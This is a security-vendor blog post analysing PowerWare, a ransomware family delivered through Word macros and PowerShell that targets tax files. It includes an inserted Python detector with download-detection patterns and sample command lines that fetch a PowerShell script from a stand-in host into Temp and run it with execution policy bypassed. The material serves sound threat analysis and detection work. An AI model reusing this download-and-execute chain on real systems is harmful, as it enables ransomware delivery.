Tax Day Extortion: PowerWare Crypto-ransomware Targets Tax Files

  • Posted on: March 31, 2016 at 5:00 am
  • Posted in: Malware, Ransomware, Spam
  • Author: Trend Micro

by Anthony Melgarejo and Rhena Inocencio 

Some things in life are certain, and the same can be said about cybercrime. Tax Day is drawing closer in the U.S., and as millions of Americans file their taxes, cybercriminals are stepping in to make this task profitable for themselves and difficult for their victims. We have recently seen organizations fall for business email compromise (BEC) schemes related to tax filing; now it looks like online extortionists have joined the fray as well.

PowerWare (detected by Trend Micro as RANSOM_POWERWARE.A) is a new crypto-ransomware family that abuses Windows PowerShell for its infection routine. Apart from encrypting the file types commonly targeted by ransomware, PowerWare also targets tax return files created by tax filing programs (for example, files with .tax2013 and .tax2014 extensions). For users and organizations, losing current and previous years’ records can be a hassle and sometimes costly; in the U.S., for example, taxpayers are advised to keep the records of their tax returns for about three (3) years after filing them, because the statute of limitations for the assessment of taxes and refunds runs for that same period.

It is also worth noting that while ransomware families that target specific tax-related files have been seen before, PowerWare’s technique of combining a macro with PowerShell is quite uncommon.

Figure 1. Spam confuses users with “Invoice” as subject and “Financial Manager” as the sender

The infection starts when targets open a Microsoft Word document with an embedded malicious macro. This document is spread via emails, which is a common way to deliver crypto-ransomware.

The document instructs the victim to enable macros. Once they are enabled, the malicious macro executes the following code:


Figure 2. Word document instructing users to enable macros


Figure 3. Snippet of the code that calls PowerShell

As seen in the code above, the macro uses cmd to launch an instance of powershell.exe. This instance connects to a website, downloads the PowerWare ransomware script (also written in PowerShell), and saves it in the Windows temporary folder as Y.ps1. The code then launches a second PowerShell instance to run PowerWare.
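As an added detection example (not code from the original post or from Trend Micro), the Python below looks for the chain described above in process-creation telemetry: an Office application spawning cmd.exe and then powershell.exe, with a command line that fetches content from the network or runs a .ps1 out of the Temp folder. The event field names and the sample records are constructed assumptions, not real data.

```python
import re

# Field names (pid, ppid, image, cmdline) are assumptions modelled loosely on Sysmon Event ID 1.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
INDICATORS = (  # (pattern over the command line, reason reported when it matches)
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
     "network download in command line"),
    (re.compile(r"\\temp\\[^\\\s\"']+\.ps1\b", re.I), ".ps1 in Temp folder"),
)

def image_name(path):
    """Lower-cased file name of an image path, e.g. 'powershell.exe'."""
    return path.rsplit("\\", 1)[-1].lower()

def find_powerware_chains(events, max_depth=4):
    """Flag powershell.exe processes whose command line matches an INDICATOR and
    that descend from an Office application within max_depth hops."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if image_name(ev["image"]) != "powershell.exe":
            continue
        reasons = [why for pat, why in INDICATORS if pat.search(ev["cmdline"])]
        if not reasons:
            continue
        lineage, cur = [image_name(ev["image"])], ev
        for _ in range(max_depth):  # walk up the process tree to an Office ancestor
            cur = by_pid.get(cur["ppid"])
            if cur is None:
                break
            lineage.insert(0, image_name(cur["image"]))
            if lineage[0] in OFFICE_APPS:
                findings.append({"pid": ev["pid"], "lineage": lineage, "reasons": reasons})
                break
    return findings

# Constructed sample telemetry (not real data); pid 600 is a benign download from Explorer.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE /n "C:\Users\bob\Downloads\invoice.doc"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -ExecutionPolicy Bypass -WindowStyle Hidden -c <downloader>"},
    {"pid": 400, "ppid": 300, "image": PS, "cmdline": r'powershell -c "(New-Object Net.WebClient)'
     r'.DownloadFile(\"http://example.invalid/dl\", \"C:\Users\bob\AppData\Local\Temp\Y.ps1\")"'},
    {"pid": 500, "ppid": 400, "image": PS,
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Users\bob\AppData\Local\Temp\Y.ps1"},
    {"pid": 600, "ppid": 100, "image": PS,
     "cmdline": "powershell Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
]
```

Run against the sample events, the downloader (pid 400) and the second PowerShell instance running Y.ps1 (pid 500) are flagged with their Word-to-PowerShell lineage, while the Explorer-launched download is not.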

As mentioned earlier, PowerWare encrypts files with the .tax2013 and .tax2014 extensions, among others, before deleting itself. It also drops an HTML file named “FILES_ENCRYPTED-READ_ME.HTML” in every folder that contains an encrypted file, detailing how the affected user can get their files back.

The attackers demand US$500 or 1.188 BTC and double that if the victim fails to pay before their deadline.

Figure 4. HTML page explaining the situation to the victim

Figure 5. Ransomware payment procedures

Figure 6. Ransom payment confirmation

Although PowerWare is a new family of crypto-ransomware, it mimics CryptoWall to a certain extent. It uses the same ransom note design as CryptoWall, and upon accessing the payment site, one can also observe the title bar bearing “CryptoWall Decript Service.” PowerWare appears to be aiming for the same impact that CryptoWall once had.

PowerWare also enumerates all logical drives, including mapped network drives, making it a major threat to large companies with little or no experience in handling threats such as crypto-ransomware.

How to be ransomware-free this tax season

Knowledge of such threats serves as a user’s front line of defense against ransomware. Creating sufficient and regularly scheduled backups also helps mitigate the damage done by ransomware. We also encourage users to follow the 3-2-1 rule for backing up their files:

  • At least three copies,
  • In two different formats,
  • With one of those copies off-site.

Trend Micro endpoint solutions such as Trend Microℱ Security, Smart Protection Suites, and Worry-Freeℱ Business Security can protect users and businesses from this threat by detecting the malicious files and email messages before a user gets infected. They are also capable of blocking all related malicious URLs.

Products using the ATSE (Advanced Threats Scan Engine), such as Deep Discovery, also detect this threat under the following detection names: PHP_POWERWARE.A, JS_CRYPWALL.IO, and W2KM_CRYPWALL.IO.

SHA1s for related files:

  • 9abeef3ed793f28a24562c3e5c3104eee99daa1c – downloader
  • 8a26892a7949c6a29d9d620c2ffd4c58921d6736 – PowerWare
  • ee2c9cf8cf6314c27e9724c529df8b3fb7c2e985 – PowerWare

Additional analysis by Ruby Santos
